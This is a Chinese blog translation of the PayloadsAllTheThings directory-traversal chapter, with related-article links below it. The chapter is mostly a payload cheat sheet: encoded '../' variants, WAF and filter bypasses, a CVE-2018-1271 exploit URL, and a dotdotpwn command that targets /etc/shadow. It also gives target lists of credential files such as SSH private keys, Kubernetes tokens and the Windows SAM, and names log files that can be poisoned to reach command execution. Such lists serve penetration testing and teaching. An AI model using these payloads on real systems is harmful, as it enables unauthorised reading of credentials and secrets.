【翻译】PayloadsAllTheThings——目录遍历 (Directory Traversal)

最新推荐文章于 2023-09-11 13:51:28 发布
最新推荐文章于 2023-09-11 13:51:28 发布
阅读量588 收藏 2
点赞数
分类专栏: PayloadAllTheThings翻译 文章标签: web安全 网络安全
原文链接:https://github.com/swisskyrepo/PayloadsAllTheThings
版权

【翻译】PayloadsAllTheThings——目录穿越 (Directory Traversal)

目录穿越 (Directory Traversal)

本文翻译自:swisskyrepo/PayloadsAllTheThings
在原文基础增加了未提到的利用方法。
github上该项目,同目录下有关目录穿越的Intruder
2022-12-14 翻译第一版

目录和路径穿越存在于利用对用户提供的输入文件名缺乏安全验证/清扫,导致表示“遍历父目录”的字符被传递到文件api的情况。

参考工具

dotdotpwn - https://github.com/wireghoul/dotdotpwn

git clone https://github.com/wireghoul/dotdotpwn
perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b

基础漏洞利用 (Basic exploitation)

我们可以用 .. 访问父目录,下面的字符串是几种编码,可以帮助您绕过实现不佳的过滤器。

../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216

UTF-16编码 (16 bits Unicode encoding)

. = %u002e
/ = %u2215
\ = %u2216

UTF-8编码 (UTF-8 Unicode encoding)

. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c

绕过"…/"被替换成空 (Bypass “…/” replaced by “”)

有时你会遇到WAF从字符串中删除“…/”字符,仅仅重复就可以解决。

..././
...\.\

使用"…/“和”;"绕过 (Bypass “…/” with “;”)

..;/
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt

双重URL编码 (Double URL encoding)

. = %252e
/ = %252f
\ = %255c

举个例子:
Spring MVC目录遍历漏洞(CVE-2018-1271)

http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini

UNC(Universal Naming Convention 统一命名规则)绕过

攻击者可以将Windows UNC共享(‘\UNC\share\name’)注入到软件系统中,从而可能重定向访问非预期位置或任意文件

\\localhost\c$\windows\win.ini

NGINX/ALB的绕过

在特定配置下的NGINX和ALB可以阻止路由中的遍历攻击,例如:http://nginx-server/../../将返回一个400 bad request
要绕过这种行为,只需在url前加上斜杠

http://nginx-server../../

Java的绕过

绕过Java的URL协议

url:file:///etc/passwd
url:http://127.0.0.1:8080

路径穿越 (Path Traversal)

值得关注的Linux路径

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/etc/apache2/*
/etc/nginx/*
/etc/nginx/conf.d/default.conf
/etc/apparmor(.d)/*
/etc/(cron.d/*|crontab)
/etc/environment
/etc/hostname
/etc/hosts
/etc/issue
/etc/php/*
/etc/mysql/*
/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
/proc/[pid]/maps
/proc/[pid]/net/*
/proc/[pid]/(mounts|mountinfo)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db
/var/www/html
/var/lib/php(5)/sessions/
/usr/local/nginx/conf/*
/usr/local/nginx/conf/nginx.conf
[user_dir_you_know]/.bash_history
[user_dir_you_know]/.bashrc
[user_dir_you_know]/.ssh/id_rsa(.pub)
[user_dir_you_know]/.viminfo

值得关注的Windows路径

c:\windows\system32\license.rtf
c:\windows\system32\eula.txt

以下摘自于 https://github.com/soffensive/windowsblindread

c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/system

值得关注的日志文件

以下日志文件是可控的,可以包含在恶意的有效负载中以实现命令执行

/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail

靶场 (Labs)

File path traversal, simple case
File path traversal, traversal sequences blocked with absolute path bypass
File path traversal, traversal sequences stripped non-recursively
File path traversal, traversal sequences stripped with superfluous URL-decode
File path traversal, validation of start of path
File path traversal, validation of file extension with null byte bypass

参考 (References)

Path Traversal Cheat Sheet: Windows
Directory traversal attack - Wikipedia
CWE-40: Path Traversal: ‘\UNC\share\name’ (Windows UNC Share) - CWE Mitre - December 27, 2018
NGINX may be protecting your applications from traversal attacks without you even knowing
Directory traversal - Portswigger

档100_s
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PayloadsAllTheThingsWeb应用程序安全性和PentestCTF的有用负载和绕过列表
02-04
有效负载万物 Web应用程序安全性的有用负载和绕过列表。 随时改进您的有效负载和技术! 一世 :red_heart: 拉请求:) 您也可以用 :clinking_beer_mugs: IRL,或使用赞助商按钮。 每个部分都包含以下文件,您可以使用_template_vuln文件夹创建新的章节: README.md-漏洞描述以及如何利用它,包括多个有效负载 入侵者-一组要提供给Burp入侵者的文件 图片-README.md的图片 文件-README.md中引用的某些文件 您可能还喜欢Methodology and Resources文件夹: 你想要更多 ? 检查“和“ 选择。
翻译PayloadsAllTheThings——文件包含 (File Inclusion)
shilela19990628的博客
12-15 164
文件包含漏洞允许攻击者包含一个文件,通常是利用目标应用中实现的“动态文件包含”机制。
翻译PayloadsAllTheThings——命令注入 (Command Injection)
shilela19990628的博客
12-13 285
本文翻译自:swisskyrepo/PayloadsAllTheThings 在原文基础增加了未提到的利用方法。
目录遍历/穿越漏洞(Directory traversal),以及常见的payload
最新发布
嗯哼~~~
09-11 875
...//....//....//etc/passwd(嵌套../,防御机制会过滤../,但只能过滤一遍,过滤完还剩../../../etc/passwd)filename=../../../etc/passwd%00.png(要求符合的文件扩展名,%00为NULL,找文件时NULL后面的.png会被忽略)/var/www/images/../../../etc/passwd(要求指定根目录)../../../etc/passwd(无防御时)下面这个图是做了防御,但是防御的不好。
3 Directory traversal
(∪.∪ )...zzz的博客
04-28 952
3 Directory traversal目录遍历攻击 目录3 Directory traversal目录遍历攻击一、What二、通过目录遍历读取任意文件Lab: File path traversal, simple case三、利用文件路径遍历漏洞的常见障碍Lab: File path traversal, traversal sequences blocked with absolute path bypassLab: File path traversal, traversal sequences
Web漏洞探索】目录遍历漏洞
kjcxmx的博客
07-01 1530
目录遍历Directory traversal(也称文件路径遍历目录穿越、路径遍历、路径穿越)是一种允许攻击者在未授权的状态下读取应用服务上任意文件的安全漏洞。这包括应用代码、数据、凭证以及操作系统的敏感文件。在有些情况下,攻击者还可能对服务器里的文件进行任意写入,更改应用数据甚至完全控制服务器。程序系统在实现上没有过滤用户输入的…/之类的目录跳转符,允许攻击者通过提交目录跳转符来遍历服务器上的任意文件。 比如: 当服务器处理传送过来的image1.jpg文件名后,Web应用程序会自动添加完整的路径,比如
BitTraversal:Burpsuite 插件检测目录遍历漏洞
05-29
该插件使用两种主要技术来识别目录遍历漏洞 检测方法 静电检测 动态检测 i) 使用在中指定的预定义有效,这些将在运行时从 GitHub 获取并与匹配 ii) 仍在开发中。 目的是检测与/static/css/main.css/和/static/../...
dotdotpwn:DotDotPwn-目录遍历模糊器
02-05
dotdotpwn:DotDotPwn-目录遍历模糊器
path-traversal-servlet:演示目录遍历的简单 Servlet
06-26
路径遍历servlet 演示目录遍历的简单 Servlet运行应用程序mvn tomcat7:run 到试试
ACT_文件及目录.zip_act历_遍历文件及目录
09-20
遍历文件及目录用递归来实现的。Traversal of files and directories is implemented by recursion.
PayLoadAllTheThings-1:Web应用程序安全性和PentestCTF的有用负载和绕过列表
05-16
有效负载万物 Web应用程序安全性的有用负载和绕过列表。 随时改进您的有效负载和技术! 我<3拉请求:) 每个部分都包含: README.md-漏洞描述以及如何利用它 入侵者-一组要提供给Burp入侵者的文件 一些漏洞 你可能还喜欢 : 贝壳冲击 伤心欲绝 Apache Struts 2 工具 与Firefox Quantum不兼容 Wappalyzer Metasploit OpenVAS 在线挑战 砍箱子 根我 Zenk-Security W3Challs 新手竞赛 Vulnhub 隐密加密挑战 渗透测试实践实验室 提醒(1)获胜 朴素的 HackThisSite PentesterLab:学习Web渗透测试:正确的方法 Hackers.gg 错误赏金 黑客一号 BugCrowd 赏金工厂 赏金计划清单 码头工人 命令 关联 docker pull remnux
BurpSuite_payloads:与Burp Suite入侵者一起使用的有效载荷。 (最初在swisskeyrepo-PayloadsAllTheThings上找到)
04-15
BurpSuite_payloads 与Burp Suite入侵者一起使用的有效载荷(最初在swisskeyrepo-PayloadsAllTheThings上找到) 要在命令行中解压缩文件,请执行以下操作: tar xjf PayloadsAllTheThings.tar.bz2 -or- tar -xvjf PayloadsAllTheThings.tar.bz2 包括在有效载荷中: API密钥泄漏AWS Amazon Bucket S3 CORS配置错误CRLF注射CSRF注射CSV注入命令注入目录遍历文件包含GraphQL注射不安全的反序列化不安全的直接对象引用管理界面不安全安全的源代码管理JSON Web令牌Kubernetes LDAP注入乳胶注射方法与资源NoSQL注入OAuth 打开重定向比赛条件SAML注入SQL注入服务器端请求伪造服务器端模板注入类型杂耍上载不
js Element Traversal规范中的元素遍历方法
10-18
对于元素间的空格,在IE9之前,都不会返回文档节点,其它的所有浏览器都会返回文档节点,为了兼容浏览器这间的差异,又不更改已有的DOM 标准,所以有了 Element Traversal 规范
java-sec-code 目录穿越和模板注入漏洞
weixin_44687621的博客
08-18 946
目录穿越漏洞 虽然漏洞的payload非常简单,但是java的编程方法还是值得一看的。 漏洞分析 进入controller下的PathTraversal类下,可以看到如下代码。 @GetMapping("/path_traversal/vul") public String getImage(String filepath) throws IOException { return getImgBase64(filepath); } 这是漏洞的产生点,传入的参数fil
Pikachu-----目录遍历/信息泄露/PHP反序列化/XXE/URL/SSRF
m0_65712192的博客
01-03 858
Pikachu-----目录遍历/信息泄露/PHP反序列化/XXE/URL/SSRF
翻译PayloadsAllTheThings——JWT (JWT - JSON Web Token)
shilela19990628的博客
12-19 222
JSON Web Token (JWT)是一个开放标准(RFC 7519),它定义了一种紧凑且自包含的方式,用于作为JSON对象在各方之间安全地传输信息。此信息是可以验证和信任的,因为它是数字签名的。
聊聊directory traversal attack
weixin_33850015的博客
12-24 644
序 本文主要研究一下directory traversal attack及其防范 directory traversal attack 又称Path Traversal attack,即目录遍历攻击,旨在访问web服务器根目录外的文件/目录。通过是通过url或变量里头传递"../"来进行目录遍历。 通过url 比如 http://some_site.com.br/../../../../some ...
vulfocus——uWSGI 目录穿越(CVE-2018-7490)
m0_62063669的博客
09-03 518
uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。但是我没并于读取到flag,然后回到phpinfo()的页面,找到了flag。能不能进行目录穿越,结果发现发现页面和url都没有改变,说明../被过滤了。../../../看。
python和django的目录遍历漏洞(任意文件读取)
Fly_鹏程万里
03-16 5900
1. 什么是目录遍历漏洞 “目录遍历漏洞”的英文名称是Directory Traversal 或 Path Traversal。指攻击者通过在URL或参数中构造 ../ ..%2F /%c0%ae%c0%ae/ %2e%2e%2f 或类似的跨父目录字符串,完成目录跳转,读取操作系统各个目录下的敏感文件。很多时候,我们也把它称作“任意文件读取漏洞”。 2. Python和Djan...
渗透测试目录遍历测试方法描述
05-17
目录遍历测试(Directory Traversal Testing)是一种常见的渗透测试方法,用于测试Web应用程序是否容易受到目录遍历攻击。目录遍历攻击是一种利用Web应用程序中存在的漏洞来访问服务器上的敏感文件或目录的攻击方式。 下面是一种目录遍历测试的方法描述: 1. 确定目标:确定要测试的Web应用程序。 2. 收集信息:通过使用工具或手动方法,收集有关目标Web应用程序的信息,例如Web应用程序的URL,文件系统的路径等等。 3. 确定攻击点:通过分析目标Web应用程序的代码,确定可能存在目录遍历漏洞的攻击点。 4. 构造攻击字符串:使用攻击字符串来测试目标Web应用程序的漏洞,例如 "../" 或 "..\" 字符串。 5. 发送攻击请求:使用浏览器、命令行工具或自动化工具发送构造好的攻击请求,并观察响应是否包含敏感文件或目录。 6. 分析结果:分析攻击请求的响应,如果响应包含敏感文件或目录,则意味着目标Web应用程序存在目录遍历漏洞。 7. 提交漏洞报告:将测试结果记录在漏洞报告中,并提交给Web应用程序的开发人员进行修复。 需要注意的是,目录遍历测试可能会对服务器造成一定的负荷,因此在进行测试时应该谨慎,并且遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值